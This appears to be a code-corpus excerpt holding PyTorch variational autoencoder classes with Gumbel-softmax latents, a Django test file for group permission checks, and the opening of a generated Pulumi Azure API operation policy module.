nn.Linear(self.hidden_dim, 16 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(16, 16, (4, 4), stride=2, padding=1),  # match the (16, 4, 4) reshape above
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(16, 8, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(8, 8, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(8, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at indices
# max_alpha. Note the view is because scatter_ only accepts 2D
# tensors.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
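# Hedged usage sketch (not part of the original file): a CPU forward pass
# through VAE_OPERATOR with a joint continuous/discrete latent spec. The image
# size, latent sizes, and batch size below are illustrative.
def _demo_vae_operator():
    model = VAE_OPERATOR(img_size=(1, 32, 32),
                         latent_spec={'cont': 10, 'disc': [3]},
                         use_cuda=False)
    x = torch.rand(8, 1, 32, 32)          # batch of 32x32 grayscale images in [0, 1]
    recon, latent_dist = model(x)
    assert recon.shape == x.shape         # the decoder mirrors the input size
    assert len(latent_dist['disc']) == 1  # one categorical latent of dimension 3
    return recon, latent_dist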
class VAE_EMNIST(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=256):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(VAE_EMNIST, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (64, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Initial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(32, 64, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(64 * 4 * 4, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, 64 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(64, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at indices
# max_alpha. Note the view is because scatter_ only accepts 2D
# tensors.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
class BTCVAE_EMNIST(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=256):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(BTCVAE_EMNIST, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (64, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Initial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(32, 64, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(64 * 4 * 4, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, 64 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(64, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
self.latent_cont_sample = None
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
self.latent_cont_sample = cont_sample
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at the indices given
# by max_alpha. The view reshapes max_alpha to (N, 1) so the index tensor
# has the same number of dimensions as one_hot_samples, as scatter_ requires.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
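As a minimal, self-contained sketch of the Gumbel-softmax reparameterization used by sample_gumbel_softmax above (the EPS constant and temperature value here are assumed stand-ins for the ones defined elsewhere in the original module):

import torch
import torch.nn.functional as F

EPS = 1e-12          # assumed value; the original module defines its own EPS constant
temperature = 0.67   # assumed value; the model reads self.temperature

# alpha plays the role of one categorical distribution's parameters, shape (N, D)
alpha = F.softmax(torch.randn(4, 3), dim=1)
unif = torch.rand(alpha.size())
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)    # Gumbel(0, 1) noise
logit = (torch.log(alpha + EPS) + gumbel) / temperature
soft_one_hot = F.softmax(logit, dim=1)               # differentiable, near one-hot sample

At evaluation time the model instead takes the argmax of alpha and builds a hard one-hot vector, exactly as in the else branch of sample_gumbel_softmax.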
[flattened numeric statistics and quality-signal columns for the preceding record omitted]

hexsha: 589cca608559d9a6b011ed6cbb7686d68fba4700 | size: 2,209 | ext: py | lang: Python
path: website/canvas/tests/test_authorization.py
repo: bopopescu/drawquest-web @ 8d8f9149b6efeb65202809a5f8916386f58a1b3b
licenses: ["BSD-3-Clause"]
stars: 61 (2015-11-10T17:13:46.000Z to 2021-08-06T17:58:30.000Z)
issues: 13 (2015-11-11T07:49:41.000Z to 2021-06-09T03:45:31.000Z)
forks: 18 (2015-11-11T04:50:04.000Z to 2021-08-20T00:57:11.000Z)
content:
from canvas.tests.tests_helpers import CanvasTestCase, create_user, create_staff, create_group
class TestAuthorization(CanvasTestCase):
def test_user_cannot_moderate_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_moderate(normal_user))
def test_user_cannot_disable_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_disable(normal_user))
def test_user_cannot_modify_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_modify(normal_user))
def test_moderator_cannot_modify_group(self):
normal_user, group = create_user(), create_group()
group.moderators.add(normal_user)
self.assertFalse(group.can_modify(normal_user))
def test_staff_cannot_modify_group(self):
staff_user, group = create_staff(), create_group()
self.assertFalse(group.can_modify(staff_user))
def test_founder_can_modify_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertTrue(group.can_modify(normal_user))
def test_founder_can_moderate_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertTrue(group.can_moderate(normal_user))
def test_moderator_can_moderate_group(self):
normal_user, group = create_user(), create_group()
group.moderators.add(normal_user)
self.assertTrue(group.can_moderate(normal_user))
def test_founder_cannot_disable_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertFalse(group.can_disable(normal_user))
def test_staff_cannot_moderate_group(self):
staff_user, group = create_staff(), create_group()
self.assertFalse(group.can_moderate(staff_user))
def test_staff_can_disable_group(self):
staff_user, group = create_staff(), create_group()
self.assertTrue(group.can_disable(staff_user))
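Read together, these assertions pin down a simple permission matrix: only the founder may modify a group, founders and moderators may moderate it, and only staff may disable it. A minimal plain-Python sketch consistent with the tests (hypothetical; the real Group model is the Django-backed one in the canvas app):

class GroupPermissionsSketch:
    """Illustrative only: mirrors the rules asserted in TestAuthorization."""

    def __init__(self):
        self.founder = None
        self.moderators = set()

    def can_modify(self, user):
        # Only the founder may modify the group.
        return user == self.founder

    def can_moderate(self, user):
        # Founders and moderators may moderate; staff alone may not.
        return user == self.founder or user in self.moderators

    def can_disable(self, user):
        # Only staff may disable the group.
        return getattr(user, "is_staff", False)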
[flattened numeric statistics and quality-signal columns for the preceding record omitted]

hexsha: 543a79c40e14b4614ee77ce81f9c6d0bd99833a2 | size: 20,567 | ext: py | lang: Python
path: sdk/python/pulumi_azure/apimanagement/api_operation_policy.py
repo: henriktao/pulumi-azure @ f1cbcf100b42b916da36d8fe28be3a159abaf022
licenses: ["ECL-2.0", "Apache-2.0"]
stars: 109 (2018-06-18T00:19:44.000Z to 2022-02-20T05:32:57.000Z)
issues: 663 (2018-06-18T21:08:46.000Z to 2022-03-31T20:10:11.000Z)
forks: 41 (2018-07-19T22:37:38.000Z to 2022-03-14T10:56:26.000Z)
content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ApiOperationPolicyArgs', 'ApiOperationPolicy']
@pulumi.input_type
class ApiOperationPolicyArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
api_name: pulumi.Input[str],
operation_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing an ApiOperationPolicy resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "api_name", api_name)
pulumi.set(__self__, "operation_id", operation_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if xml_content is not None:
pulumi.set(__self__, "xml_content", xml_content)
if xml_link is not None:
pulumi.set(__self__, "xml_link", xml_link)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Input[str]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> pulumi.Input[str]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@operation_id.setter
def operation_id(self, value: pulumi.Input[str]):
pulumi.set(self, "operation_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> Optional[pulumi.Input[str]]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@xml_content.setter
def xml_content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_content", value)
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> Optional[pulumi.Input[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
@xml_link.setter
def xml_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_link", value)
@pulumi.input_type
class _ApiOperationPolicyState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApiOperationPolicy resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if api_name is not None:
pulumi.set(__self__, "api_name", api_name)
if operation_id is not None:
pulumi.set(__self__, "operation_id", operation_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if xml_content is not None:
pulumi.set(__self__, "xml_content", xml_content)
if xml_link is not None:
pulumi.set(__self__, "xml_link", xml_link)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> Optional[pulumi.Input[str]]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@operation_id.setter
def operation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operation_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> Optional[pulumi.Input[str]]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@xml_content.setter
def xml_content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_content", value)
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> Optional[pulumi.Input[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
@xml_link.setter
def xml_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_link", value)
class ApiOperationPolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an API Management API Operation Policy
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_api_operation = azure.apimanagement.ApiOperation("exampleApiOperation")
#...
example_api_operation_policy = azure.apimanagement.ApiOperationPolicy("exampleApiOperationPolicy",
api_name=example_api_operation.api_name,
api_management_name=example_api_operation.api_management_name,
resource_group_name=example_api_operation.resource_group_name,
operation_id=example_api_operation.operation_id,
xml_content=\"\"\"<policies>
<inbound>
<find-and-replace from="xyz" to="abc" />
</inbound>
</policies>
\"\"\")
```
## Import
API Management API Operation Policy can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/apiOperationPolicy:ApiOperationPolicy example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/apis/api1/operations/operation1/policies/policy
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
